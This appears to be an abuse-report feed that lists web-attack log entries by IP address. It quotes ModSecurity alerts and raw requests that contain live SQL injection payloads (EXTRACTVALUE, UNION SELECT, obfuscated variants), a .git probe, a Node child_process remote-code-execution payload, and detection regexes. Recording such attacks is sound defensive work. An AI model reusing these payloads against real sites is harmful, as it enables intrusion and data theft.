π«π·
88.184.187.56
5 seconds ago
88.184.187.56 - - [09/Sep/2026:03:26:46 -0400] "GET /subscribe/show_product.php?sourceid=%29%20AND%2 ...
show more
88.184.187.56 - - [09/Sep/2026:03:26:46 -0400] "GET /subscribe/show_product.php?sourceid=%29%20AND%20%281040297177%3D1040297177AND%20EXTRACTVALUE%289461%2CCONCAT%280x7e%2C%28%28SELECT%20%28ELT%289461%3D9461%2C1%29%29%29%29%2C0x7e%29%29&db_type=product&itemid=UB-R258 HTTP/1.1" 200 19336 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
show less
SQL Injection
π«π·
88.183.208.139
1 minute ago
[Wed Sep 09 03:26:56.595162 2026] [security2:error] [pid 12689:tid 12943] [client 88.183.208.139:532 ...
show more
[Wed Sep 09 03:26:56.595162 2026] [security2:error] [pid 12689:tid 12943] [client 88.183.208.139:53202] [client 88.183.208.139] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's)&(s' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s)&(s found within ARGS:itemid: ') AND ('llvrya'='llvrya'AND EXTRACTVALUE(9519,CONCAT(0x7e,((SELECT (ELT(9519=9519,1)))),0x7e))"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.nwcdinc.com"] [uri "/subscribe/show_product.php"] [unique_id "aqEKQBE68dh3Uqbh0dB3uQAABBs"]
show less
SQL Injection
π«π·
90.76.173.124
1 minute ago
[Wed Sep 09 03:27:14.403747 2026] [security2:error] [pid 12689:tid 12976] [client 90.76.173.124:4187 ...
show more
[Wed Sep 09 03:27:14.403747 2026] [security2:error] [pid 12689:tid 12976] [client 90.76.173.124:41870] [client 90.76.173.124] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's)&(s' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s)&(s found within ARGS:itemid: ')/**/AND/**/('MyvaDn'='MYvADn'AND/**/EXTRACTVALUE(9519,CONCAT(0x7e,((SELECT/**/(ELT(9519=9519,1)))),0x7e))"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.nwcdinc.com"] [uri "/subscribe/show_product.php"] [unique_id "aqEKUhE68dh3Uqbh0dB3ygAABCs"]
show less
SQL Injection
π«π·
77.129.10.186
2 minutes ago
77.129.10.186 - - [09/Sep/2026:03:27:35 -0400] "GET /subscribe/show_product.php?sourceid=2958&db_typ ...
show more
77.129.10.186 - - [09/Sep/2026:03:27:35 -0400] "GET /subscribe/show_product.php?sourceid=2958&db_type=product&itemid=%252527%29%2F**%2FAND%2F**%2F%28%252527sYKlYH%252527%3D%252527SyKlYH%252527AND%2F**%2FEXTRACTVALUE%289519%2CCONCAT%280x7e%2C%28%28SELECT%2F**%2F%28ELT%289519%3D9519%2C1%29%29%29%29%2C0x7e%29%29 HTTP/1.1" 200 19158 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
show less
SQL Injection
π«π·
89.92.125.164
4 minutes ago
[Wed Sep 09 03:27:55.632129 2026] [security2:error] [pid 12689:tid 12887] [client 89.92.125.164:1705 ...
show more
[Wed Sep 09 03:27:55.632129 2026] [security2:error] [pid 12689:tid 12887] [client 89.92.125.164:17056] [client 89.92.125.164] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table) |delete[[:space:]] .{1,100}+ update [a-z0-9]+ set .{1,100}+=|union all select |\\\\bunion\\\\b.{1,100}?\\\\bselect\\\\b.*[a-z0-9]+ from |select (?:load_file|char ?\\\\()|(?:insert|remark)tes ..." at ARGS:db_type. [file "/etc/apache2/conf.d/modsec2/10_asl_rules.conf"] [line "318"] [id "340144"] [rev "35"] [msg "Atomicorp.com UNSUPPORTED DELAYED Rules: Generic SQL injection protection 2"] [data "get /subscribe/show_product.php?sourceid=2958&db_type=%252527%29%2f**%2fand%2f**%2f%28%252527jvutjk%252527%3d%252527jvutjk%252527%2f**%2funion%2f**%2fall%2f**%2fselect%2f**%2f%252527fpuixkohcjbbalygkylhyaoeuqitcrak%252527--%2f**%2fof3mbc&itemid=ub-r258 http/1.1"] [severity "CRITICAL"] [hostname "www.nwcdinc.com"] [uri "/subscribe/show_product.php"] [unique_id
show less
Hacking
π«π·
90.90.133.144
7 minutes ago
[Wed Sep 09 03:28:26.679048 2026] [security2:error] [pid 12688:tid 12853] [client 90.90.133.144:5328 ...
show more
[Wed Sep 09 03:28:26.679048 2026] [security2:error] [pid 12688:tid 12853] [client 90.90.133.144:53288] [client 90.90.133.144] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's)&(s' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s)&(s found within ARGS:itemid: ')/**/AND/**/('zuzhao'='zuzhao'AND/**/EXTRACTVALUE(7421,CONCAT(0x7e,((SELECT/**/(ELT(7421=7421,1)))),0x7e))"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.nwcdinc.com"] [uri "/subscribe/show_product.php"] [unique_id "aqEKmnouqJQoKk7-vDgJfwAAA0g"]
show less
SQL Injection
π«π·
176.141.164.19
9 minutes ago
[Wed Sep 09 03:28:39.048271 2026] [security2:error] [pid 12689:tid 12984] [client 176.141.164.19:406 ...
show more
[Wed Sep 09 03:28:39.048271 2026] [security2:error] [pid 12689:tid 12984] [client 176.141.164.19:40634] [client 176.141.164.19] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&f(1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: s&f(1 found within ARGS:sourceid: 2958%' AND EXTRACTVALUE(7037,CONCAT(0x7e,((SELECT (ELT(7037=7037,1)))),0x7e))-- -"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.nwcdinc.com"] [uri "/subscribe/show_product.php"] [unique_id "aqEKphE68dh3Uqbh0dB4FQAABC8"]
show less
Web App Attack
ππ°
183.87.97.158
10 minutes ago
[Wed Sep 09 03:30:19.777473 2026] [security2:error] [pid 12687:tid 12836] [client 183.87.97.158:2039 ...
show more
[Wed Sep 09 03:30:19.777473 2026] [security2:error] [pid 12687:tid 12836] [client 183.87.97.158:20397] [client 183.87.97.158] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/content/page.php"] [unique_id "aqELC6mraVsUO9zPJfvqxgAAAuc"], referer: https://nwcdinc.com/
show less
Hacking
πΊπΈ
45.131.193.155
10 minutes ago
[Wed Sep 09 03:34:58.266573 2026] [proxy_fcgi:error] [pid 12685:tid 12722] [client 45.131.193.155:29 ...
show more
[Wed Sep 09 03:34:58.266573 2026] [proxy_fcgi:error] [pid 12685:tid 12722] [client 45.131.193.155:29091] AH01071: Got error 'Primary script unknown'
show less
Hacking
πΊπΈ
69.171.230.38
11 minutes ago
[Wed Sep 09 03:39:52.280588 2026] [proxy_http:error] [pid 12690:tid 12963] [client 69.171.230.38:405 ...
show more
[Wed Sep 09 03:39:52.280588 2026] [proxy_http:error] [pid 12690:tid 12963] [client 69.171.230.38:40510] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
show less
Hacking
πΊπΈ
173.252.82.35
12 minutes ago
[Wed Sep 09 03:41:21.109478 2026] [proxy_http:error] [pid 12689:tid 12901] [client 173.252.82.35:515 ...
show more
[Wed Sep 09 03:41:21.109478 2026] [proxy_http:error] [pid 12689:tid 12901] [client 173.252.82.35:51520] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
show less
Hacking
πΊπΈ
104.234.32.14
12 minutes ago
[Wed Sep 09 03:41:26.422217 2026] [proxy_fcgi:error] [pid 12689:tid 12937] [client 104.234.32.14:563 ...
show more
[Wed Sep 09 03:41:26.422217 2026] [proxy_fcgi:error] [pid 12689:tid 12937] [client 104.234.32.14:56355] AH01071: Got error 'Primary script unknown'
show less
Hacking
ππ°
183.87.96.79
13 minutes ago
[Wed Sep 09 03:48:23.769257 2026] [security2:error] [pid 12688:tid 12888] [client 183.87.96.79:40545 ...
show more
[Wed Sep 09 03:48:23.769257 2026] [security2:error] [pid 12688:tid 12888] [client 183.87.96.79:40545] [client 183.87.96.79] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/pages/black-poly-plug-buttons-flush-type-p2891.html"] [unique_id "aqEPR3ouqJQoKk7-vDgLdQAAA2M"], referer: https://nwcdinc.com/
show less
Hacking
π¨π¦
152.232.212.169
13 minutes ago
[Wed Sep 09 03:48:52.429288 2026] [security2:error] [pid 12688:tid 12915] [client 152.232.212.169:48 ...
show more
[Wed Sep 09 03:48:52.429288 2026] [security2:error] [pid 12688:tid 12915] [client 152.232.212.169:48898] [client 152.232.212.169] ModSecurity: Warning. Pattern match "(?i:(?:\\\\s*?(?:exec|execute).*?(?:\\\\W)xp_cmdshell)|(?:[\\"'`]\\\\s*?!\\\\s*?[\\"'`\\\\w])|(?:from\\\\W+information_schema\\\\W)|(?:(?:(?:current_)?user|database|schema|connection_id)\\\\s*?\\\\([^\\\\)]*?)|(?:[\\"'`];?\\\\s*?(?:select|union|having)\\\\b\\\\s*?[^\\\\s])|(?:\\\\wiif ..." at ARGS:requests[1][body][requests][1][path]. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "61"] [id "942190"] [rev "2"] [msg "Detects MSSQL code execution and information gathering attempts"] [data "Matched Data: UNION ALL SELECT found within ARGS:requests[1][body][requests][1][path]: /wp/v2/widgets?author_exclude=111111110000000011111111000000001111111100000000111111110000000011111111000000001111111100000000111111110000000011111111000000001111111100000000111111110000000011111111000000001111111
show less
Web App Attack
πΊπΈ
69.171.230.2
14 minutes ago
[Wed Sep 09 03:55:31.885942 2026] [proxy_http:error] [pid 12689:tid 12922] [client 69.171.230.2:5067 ...
show more
[Wed Sep 09 03:55:31.885942 2026] [proxy_http:error] [pid 12689:tid 12922] [client 69.171.230.2:50678] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
show less
Hacking
πΊπΈ
20.40.222.214
15 minutes ago
[Wed Sep 09 03:59:26.661462 2026] [security2:error] [pid 12688:tid 12880] [client 20.40.222.214:1603 ...
show more
[Wed Sep 09 03:59:26.661462 2026] [security2:error] [pid 12688:tid 12880] [client 20.40.222.214:16034] [client 20.40.222.214] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "69.16.227.120"] [uri "/.git/HEAD"] [unique_id "aqER3nouqJQoKk7-vDgMmwAAA18"]
show less
Web App Attack
ππ°
42.201.192.90
16 minutes ago
[Wed Sep 09 03:59:51.992687 2026] [security2:error] [pid 12687:tid 12806] [client 42.201.192.90:5723 ...
show more
[Wed Sep 09 03:59:51.992687 2026] [security2:error] [pid 12687:tid 12806] [client 42.201.192.90:57236] [client 42.201.192.90] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/pages/brass-push-to-connect-fittings-p2879.html"] [unique_id "aqER96mraVsUO9zPJfvr4AAAAso"], referer: https://nwcdinc.com/
show less
Hacking
ππ°
183.87.96.16
16 minutes ago
[Wed Sep 09 03:59:58.746796 2026] [security2:error] [pid 12689:tid 12984] [client 183.87.96.16:43834 ...
show more
[Wed Sep 09 03:59:58.746796 2026] [security2:error] [pid 12689:tid 12984] [client 183.87.96.16:43834] [client 183.87.96.16] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/pages/phillips-pan-head-p2787.html"] [unique_id "aqER_hE68dh3Uqbh0dB9RQAABC8"], referer: https://nwcdinc.com/
show less
Hacking
ππ°
183.87.96.74
17 minutes ago
[Wed Sep 09 04:06:35.028098 2026] [security2:error] [pid 12689:tid 12982] [client 183.87.96.74:35521 ...
show more
[Wed Sep 09 04:06:35.028098 2026] [security2:error] [pid 12689:tid 12982] [client 183.87.96.74:35521] [client 183.87.96.74] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/pages/quick-links-p12723.html"] [unique_id "aqETihE68dh3Uqbh0dB_GgAABC4"], referer: https://nwcdinc.com/
show less
Hacking
ππ°
183.87.99.190
17 minutes ago
[Wed Sep 09 04:06:49.368980 2026] [security2:error] [pid 12688:tid 12882] [client 183.87.99.190:4741 ...
show more
[Wed Sep 09 04:06:49.368980 2026] [security2:error] [pid 12688:tid 12882] [client 183.87.99.190:47410] [client 183.87.99.190] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/pages/quick-links-p12723.html"] [unique_id "aqETmXouqJQoKk7-vDgOLQAAA2A"], referer: https://nwcdinc.com/
show less
Hacking
π»π³
14.187.143.172
18 minutes ago
[Wed Sep 09 04:14:35.652333 2026] [security2:error] [pid 12688:tid 12863] [client 14.187.143.172:542 ...
show more
[Wed Sep 09 04:14:35.652333 2026] [security2:error] [pid 12688:tid 12863] [client 14.187.143.172:54214] [client 14.187.143.172] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: /pages/ONeill-loses-to-Valentine-a10306.html?view_archive=Yes found within ARGS:return: /pages/ONeill-loses-to-Valentine-a10306.html?view_archive=Yes"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "holtindependent.com"] [uri "/subscribe/customer_login.php"] [unique_id "aqEVa3ouqJQoKk7-vDgO_AAAA08"]
show less
SQL Injection
πΈπ¬
203.17.180.210
19 minutes ago
[Wed Sep 09 04:14:50.718538 2026] [security2:error] [pid 12689:tid 12906] [client 203.17.180.210:505 ...
show more
[Wed Sep 09 04:14:50.718538 2026] [security2:error] [pid 12689:tid 12906] [client 203.17.180.210:50534] [client 203.17.180.210] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: /pages/ONeill-Boys-at-State-a9095.html?view_archive=Yes found within ARGS:return: /pages/ONeill-Boys-at-State-a9095.html?view_archive=Yes"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "holtindependent.com"] [uri "/subscribe/customer_login.php"] [unique_id "aqEVehE68dh3Uqbh0dCA1wAABAw"]
show less
Web App Attack
π―π΅
34.104.251.118
20 minutes ago
[Wed Sep 09 04:18:25.143701 2026] [security2:error] [pid 12689:tid 12940] [client 34.104.251.118:530 ...
show more
[Wed Sep 09 04:18:25.143701 2026] [security2:error] [pid 12689:tid 12940] [client 34.104.251.118:53034] [client 34.104.251.118] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S](?:x(?:link:href|html|mlns)|!ENTITY.*?SYSTEM|data:text\\\\/html|pattern(?=.*?=)|formaction|\\\\@import|base64)\\\\b" at ARGS:0. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "58"] [id "941130"] [rev "2"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271)) | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \
show less
Web App Attack
ππ°
42.201.192.40
21 minutes ago
[Wed Sep 09 04:20:54.935134 2026] [security2:error] [pid 12687:tid 12833] [client 42.201.192.40:1387 ...
show more
[Wed Sep 09 04:20:54.935134 2026] [security2:error] [pid 12687:tid 12833] [client 42.201.192.40:13875] [client 42.201.192.40] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "nwcdinc.com"] [uri "/pages/hose-clamps-std.-and-all-stainless-steel-p2898.html"] [unique_id "aqEW5qmraVsUO9zPJfvs1gAAAuU"], referer: https://nwcdinc.com/
show less
Hacking
π¨π΄
201.233.138.47
21 minutes ago
[Wed Sep 09 04:23:05.852760 2026] [security2:error] [pid 12688:tid 12880] [client 201.233.138.47:423 ...
show more
[Wed Sep 09 04:23:05.852760 2026] [security2:error] [pid 12688:tid 12880] [client 201.233.138.47:42355] [client 201.233.138.47] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: /pages/ONEILL-PROM-a8889.html?view_archive=No found within ARGS:return: /pages/ONEILL-PROM-a8889.html?view_archive=No"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "holtindependent.com"] [uri "/subscribe/customer_login.php"] [unique_id "aqEXaXouqJQoKk7-vDgP7gAAA18"]
show less
SQL Injection